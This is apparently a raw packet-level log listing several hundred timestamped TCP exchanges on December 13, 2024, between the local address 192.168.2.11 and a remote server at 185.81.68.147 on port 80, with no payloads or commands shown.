                                                                                                                                                                                                Dec 13, 2024 08:18:52.656090975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.656232119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.656321049 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.657299042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.657354116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.657444000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.658488989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.658600092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.658689022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.659862995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.660239935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.660356045 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.660921097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.661036015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.661123991 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.662019968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.662208080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.662297010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.663233042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.663341045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.663431883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.664438963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.664577007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.664669037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.665628910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.665745020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.665832996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.666825056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.666914940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.667004108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.667963028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.715039968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.797319889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.797403097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.797580004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.797871113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.798079967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.798146009 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.798197031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.799302101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.799365044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.799382925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.800522089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.800597906 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.800600052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.801693916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.801772118 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.801775932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.802865028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.802911043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.802936077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.804063082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.804141045 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.804197073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.805270910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.805341959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.805349112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.806582928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.806641102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.806658983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.807646990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.807725906 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.807774067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.808851004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.808921099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.808948040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.810074091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.810138941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.810165882 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.811268091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.811348915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.811369896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.812376976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.812458992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.812547922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.813606977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.813678026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.813688993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.814830065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.814918041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.814929008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.815982103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.816067934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.816096067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.817187071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.817270041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.817271948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.818397045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.818484068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.818487883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.819626093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.819696903 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.819704056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.820774078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.820846081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.820869923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.821976900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.822055101 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.822072983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.823196888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.823277950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.823292971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.824321985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.824408054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.824450970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.825589895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.825655937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.825700045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.826782942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.826848030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.826867104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.827930927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.827997923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.828043938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.829132080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.829185963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.829257965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.830363989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.830413103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.830439091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.831537962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.831641912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.831666946 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.832679033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.832765102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.832798958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.833906889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.833964109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.834007978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.835107088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.835170031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.835186005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.836306095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.836457014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.836487055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.837680101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.837693930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.837790012 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.838676929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.838736057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.838799953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.839883089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.839973927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.839975119 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.841062069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.841105938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.841129065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.842298985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.842363119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.842446089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.843534946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.843585968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.843698025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.844676018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.844748974 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.844758034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.845827103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.845917940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.845927954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.847047091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.847081900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.847117901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.848251104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.848356962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.848359108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.849430084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.849522114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.849522114 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.850595951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.850730896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.850835085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.851825953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.851883888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.851906061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.853013992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.853079081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.853082895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.854216099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.854271889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.854319096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.855398893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.855493069 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.855496883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.856574059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.856683016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.856683016 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.857769012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.857856035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.857870102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.858983994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.859024048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.859054089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.918129921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994652033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994668007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994689941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994702101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994712114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994723082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994734049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994745016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994824886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.994883060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.995383978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.995398998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.995501995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.995515108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.995515108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.995554924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.996253014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.996417999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.996551037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.997423887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.997464895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.997596025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.998614073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.998680115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.998809099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.999825001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.999933958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.000166893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.001003981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.001130104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.001748085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.002206087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.002249002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.002396107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.003412962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.003545046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.003632069 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.004611015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.004755974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.004837036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.005808115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.005856037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.005940914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.006997108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.007081985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.007179022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.008162975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.008270025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.008388996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.009344101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.009430885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.009635925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.010608912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.010744095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.011189938 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.011784077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.011904955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.012665033 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.012922049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.013025045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.013257027 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.014141083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.014225960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.014549017 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.015362978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.015388966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.015476942 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.016499996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.016624928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.016707897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.017704010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.017895937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.018929958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.019001007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.019021988 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.019049883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.020101070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.020181894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.020399094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.021341085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.021416903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.021498919 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.022510052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.022646904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.022720098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.023664951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.023788929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.024338007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.024889946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.025010109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.025083065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.026076078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.026254892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.026354074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.027280092 CET8049726185.81.68.147192.168.2.11
